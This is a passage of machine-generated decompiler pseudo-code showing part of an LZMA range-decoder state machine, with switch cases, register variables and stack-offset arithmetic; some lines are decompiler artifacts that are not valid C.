                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            												if( *(__ebp - 0x38) >= 4) {
                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                            													if( *(__ebp - 0x38) >= 0xa) {
                                            														_t98 = __ebp - 0x38;
                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                            														__eflags =  *_t98;
                                            													} else {
                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            													}
                                            												} else {
                                            													 *(__ebp - 0x38) = 0;
                                            												}
                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                            												if( *(__ebp - 0x34) == __edx) {
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													goto L61;
                                            												} else {
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__ecx =  *(__ebp - 8);
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            													goto L41;
                                            												}
                                            											case 7:
                                            												goto L0;
                                            											case 8:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x84) = 0xa;
                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            												} else {
                                            													__eax =  *(__ebp - 0x38);
                                            													__ecx =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                            													 *(__ebp - 0x84) = 9;
                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            												}
                                            												while(1) {
                                            													L132:
                                            													 *(_t621 - 0x54) = _t614;
                                            													goto L133;
                                            												}
                                            											case 9:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													goto L89;
                                            												}
                                            												__eflags =  *(__ebp - 0x60);
                                            												if( *(__ebp - 0x60) == 0) {
                                            													goto L171;
                                            												}
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            												__eflags = _t258;
                                            												0 | _t258 = _t258 + _t258 + 9;
                                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            												goto L75;
                                            											case 0xa:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x84) = 0xb;
                                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t621 - 0x54) = _t614;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x28);
                                            												goto L88;
                                            											case 0xb:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__ecx =  *(__ebp - 0x24);
                                            													__eax =  *(__ebp - 0x20);
                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												} else {
                                            													__eax =  *(__ebp - 0x24);
                                            												}
                                            												__ecx =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												L88:
                                            												__ecx =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x2c) = __eax;
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												L89:
                                            												__eax =  *(__ebp - 4);
                                            												 *(__ebp - 0x80) = 0x15;
                                            												__eax =  *(__ebp - 4) + 0xa68;
                                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            												goto L68;
                                            											case 0xc:
                                            												L99:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xc;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t334 = __ebp - 0x70;
                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t334;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												__eax =  *(__ebp - 0x2c);
                                            												goto L101;
                                            											case 0xd:
                                            												L37:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xd;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t122 = __ebp - 0x70;
                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t122;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L39:
                                            												__eax =  *(__ebp - 0x40);
                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            													goto L48;
                                            												}
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													goto L54;
                                            												}
                                            												L41:
                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            												 *(__ebp - 0x48) = __eax;
                                            												__eax = __eax + 1;
                                            												__eax = __eax << 8;
                                            												__eax = __eax + __ebx;
                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edx = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													 *(__ebp - 0x40) = 1;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													__ebx = __ebx + __ebx + 1;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edx;
                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L39;
                                            												} else {
                                            													goto L37;
                                            												}
                                            											case 0xe:
                                            												L46:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xe;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t156 = __ebp - 0x70;
                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t156;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												while(1) {
                                            													L48:
                                            													__eflags = __ebx - 0x100;
                                            													if(__ebx >= 0x100) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x58);
                                            													__edx = __ebx + __ebx;
                                            													__ecx =  *(__ebp - 0x10);
                                            													__esi = __edx + __eax;
                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                            													__ax =  *__esi;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__edi = __ax & 0x0000ffff;
                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                            													if( *(__ebp - 0xc) >= __ecx) {
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            														__cx = __ax;
                                            														_t170 = __edx + 1; // 0x1
                                            														__ebx = _t170;
                                            														__cx = __ax >> 5;
                                            														__eflags = __eax;
                                            														 *__esi = __ax;
                                            													} else {
                                            														 *(__ebp - 0x10) = __ecx;
                                            														0x800 = 0x800 - __edi;
                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            														__ebx = __ebx + __ebx;
                                            														 *__esi = __cx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														continue;
                                            													} else {
                                            														goto L46;
                                            													}
                                            												}
                                            												L54:
                                            												_t173 = __ebp - 0x34;
                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            												__eflags =  *_t173;
                                            												goto L55;
                                            											case 0xf:
                                            												L58:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xf;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t203 = __ebp - 0x70;
                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t203;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L60:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													L55:
                                            													__al =  *(__ebp - 0x44);
                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            													goto L56;
                                            												}
                                            												L61:
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t217 = __edx + 1; // 0x1
                                            													__ebx = _t217;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L60;
                                            												} else {
                                            													goto L58;
                                            												}
                                            											case 0x10:
                                            												L109:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x10;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t365 = __ebp - 0x70;
                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t365;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												goto L111;
                                            											case 0x11:
                                            												L68:
                                            												_t614 =  *(_t621 - 0x58);
                                            												 *(_t621 - 0x84) = 0x12;
                                            												while(1) {
                                            													L132:
                                            													 *(_t621 - 0x54) = _t614;
                                            													goto L133;
                                            												}
                                            											case 0x12:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 0x58);
                                            													 *(__ebp - 0x84) = 0x13;
                                            													__esi =  *(__ebp - 0x58) + 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t621 - 0x54) = _t614;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												__eflags = __eax;
                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                            												goto L130;
                                            											case 0x13:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													_t469 = __ebp - 0x58;
                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            													__eflags =  *_t469;
                                            													 *(__ebp - 0x30) = 0x10;
                                            													 *(__ebp - 0x40) = 8;
                                            													L144:
                                            													 *(__ebp - 0x7c) = 0x14;
                                            													goto L145;
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												 *(__ebp - 0x30) = 8;
                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            												L130:
                                            												 *(__ebp - 0x58) = __eax;
                                            												 *(__ebp - 0x40) = 3;
                                            												goto L144;
                                            											case 0x14:
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            												__eax =  *(__ebp - 0x80);
                                            												 *(_t621 - 0x88) = _t542;
                                            												goto L1;
                                            											case 0x15:
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            												goto L120;
                                            											case 0x16:
                                            												__eax =  *(__ebp - 0x30);
                                            												__eflags = __eax - 4;
                                            												if(__eax >= 4) {
                                            													_push(3);
                                            													_pop(__eax);
                                            												}
                                            												__ecx =  *(__ebp - 4);
                                            												 *(__ebp - 0x40) = 6;
                                            												__eax = __eax << 7;
                                            												 *(__ebp - 0x7c) = 0x19;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L145;
                                            											case 0x17:
                                            												L145:
                                            												__eax =  *(__ebp - 0x40);
                                            												 *(__ebp - 0x50) = 1;
                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            												goto L149;
                                            											case 0x18:
                                            												L146:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x18;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t484 = __ebp - 0x70;
                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t484;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L148:
                                            												_t487 = __ebp - 0x48;
                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                            												__eflags =  *_t487;
                                            												L149:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__ecx =  *(__ebp - 0x40);
                                            													__ebx =  *(__ebp - 0x50);
                                            													0 = 1;
                                            													__eax = 1 << __cl;
                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            													__eax =  *(__ebp - 0x7c);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													while(1) {
                                            														 *(_t621 - 0x88) = _t542;
                                            														goto L1;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x50);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            												__eax =  *(__ebp - 0x58);
                                            												__esi = __edx + __eax;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__ax =  *__esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													__cx = __ax >> 5;
                                            													__eax = __eax - __ecx;
                                            													__edx = __edx + 1;
                                            													__eflags = __edx;
                                            													 *__esi = __ax;
                                            													 *(__ebp - 0x50) = __edx;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L148;
                                            												} else {
                                            													goto L146;
                                            												}
                                            											case 0x19:
                                            												__eflags = __ebx - 4;
                                            												if(__ebx < 4) {
                                            													 *(__ebp - 0x2c) = __ebx;
                                            													L119:
                                            													_t393 = __ebp - 0x2c;
                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                            													__eflags =  *_t393;
                                            													L120:
                                            													__eax =  *(__ebp - 0x2c);
                                            													__eflags = __eax;
                                            													if(__eax == 0) {
                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            														goto L170;
                                            													}
                                            													__eflags = __eax -  *(__ebp - 0x60);
                                            													if(__eax >  *(__ebp - 0x60)) {
                                            														goto L171;
                                            													}
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            													__eax =  *(__ebp - 0x30);
                                            													_t400 = __ebp - 0x60;
                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            													__eflags =  *_t400;
                                            													goto L123;
                                            												}
                                            												__ecx = __ebx;
                                            												__eax = __ebx;
                                            												__ecx = __ebx >> 1;
                                            												__eax = __ebx & 0x00000001;
                                            												__ecx = (__ebx >> 1) - 1;
                                            												__al = __al | 0x00000002;
                                            												__eax = (__ebx & 0x00000001) << __cl;
                                            												__eflags = __ebx - 0xe;
                                            												 *(__ebp - 0x2c) = __eax;
                                            												if(__ebx >= 0xe) {
                                            													__ebx = 0;
                                            													 *(__ebp - 0x48) = __ecx;
                                            													L102:
                                            													__eflags =  *(__ebp - 0x48);
                                            													if( *(__ebp - 0x48) <= 0) {
                                            														__eax = __eax + __ebx;
                                            														 *(__ebp - 0x40) = 4;
                                            														 *(__ebp - 0x2c) = __eax;
                                            														__eax =  *(__ebp - 4);
                                            														__eax =  *(__ebp - 4) + 0x644;
                                            														__eflags = __eax;
                                            														L108:
                                            														__ebx = 0;
                                            														 *(__ebp - 0x58) = __eax;
                                            														 *(__ebp - 0x50) = 1;
                                            														 *(__ebp - 0x44) = 0;
                                            														 *(__ebp - 0x48) = 0;
                                            														L112:
                                            														__eax =  *(__ebp - 0x40);
                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            															_t391 = __ebp - 0x2c;
                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            															__eflags =  *_t391;
                                            															goto L119;
                                            														}
                                            														__eax =  *(__ebp - 0x50);
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            														__eax =  *(__ebp - 0x58);
                                            														__esi = __edi + __eax;
                                            														 *(__ebp - 0x54) = __esi;
                                            														__ax =  *__esi;
                                            														__ecx = __ax & 0x0000ffff;
                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                            														if( *(__ebp - 0xc) >= __edx) {
                                            															__ecx = 0;
                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            															__ecx = 1;
                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            															__ebx = 1;
                                            															__ecx =  *(__ebp - 0x48);
                                            															__ebx = 1 << __cl;
                                            															__ecx = 1 << __cl;
                                            															__ebx =  *(__ebp - 0x44);
                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                            															__cx = __ax;
                                            															__cx = __ax >> 5;
                                            															__eax = __eax - __ecx;
                                            															__edi = __edi + 1;
                                            															__eflags = __edi;
                                            															 *(__ebp - 0x44) = __ebx;
                                            															 *__esi = __ax;
                                            															 *(__ebp - 0x50) = __edi;
                                            														} else {
                                            															 *(__ebp - 0x10) = __edx;
                                            															0x800 = 0x800 - __ecx;
                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            															 *__esi = __dx;
                                            														}
                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                            															L111:
                                            															_t368 = __ebp - 0x48;
                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                            															__eflags =  *_t368;
                                            															goto L112;
                                            														} else {
                                            															goto L109;
                                            														}
                                            													}
                                            													__ecx =  *(__ebp - 0xc);
                                            													__ebx = __ebx + __ebx;
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            														__ecx =  *(__ebp - 0x10);
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            														__ebx = __ebx | 0x00000001;
                                            														__eflags = __ebx;
                                            														 *(__ebp - 0x44) = __ebx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L101:
                                            														_t338 = __ebp - 0x48;
                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                            														__eflags =  *_t338;
                                            														goto L102;
                                            													} else {
                                            														goto L99;
                                            													}
                                            												}
                                            												__edx =  *(__ebp - 4);
                                            												__eax = __eax - __ebx;
                                            												 *(__ebp - 0x40) = __ecx;
                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            												goto L108;
                                            											case 0x1a:
                                            												L56:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1a;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x68);
                                            												__al =  *(__ebp - 0x5c);
                                            												__edx =  *(__ebp - 8);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *( *(__ebp - 0x68)) = __al;
                                            												__ecx =  *(__ebp - 0x14);
                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                            												__eax = __ecx + 1;
                                            												__edx = 0;
                                            												_t192 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t192;
                                            												goto L79;
                                            											case 0x1b:
                                            												L75:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1b;
                                            													goto L170;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t274 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t274;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												_t283 = __ebp - 0x64;
                                            												 *_t283 =  *(__ebp - 0x64) - 1;
                                            												__eflags =  *_t283;
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												L79:
                                            												 *(__ebp - 0x14) = __edx;
                                            												goto L80;
                                            											case 0x1c:
                                            												while(1) {
                                            													L123:
                                            													__eflags =  *(__ebp - 0x64);
                                            													if( *(__ebp - 0x64) == 0) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__edx =  *(__ebp - 8);
                                            													__cl =  *(__eax + __edx);
                                            													__eax =  *(__ebp - 0x14);
                                            													 *(__ebp - 0x5c) = __cl;
                                            													 *(__eax + __edx) = __cl;
                                            													__eax = __eax + 1;
                                            													__edx = 0;
                                            													_t414 = __eax %  *(__ebp - 0x74);
                                            													__eax = __eax /  *(__ebp - 0x74);
                                            													__edx = _t414;
                                            													__eax =  *(__ebp - 0x68);
                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            													__eflags =  *(__ebp - 0x30);
                                            													 *( *(__ebp - 0x68)) = __cl;
                                            													 *(__ebp - 0x14) = _t414;
                                            													if( *(__ebp - 0x30) > 0) {
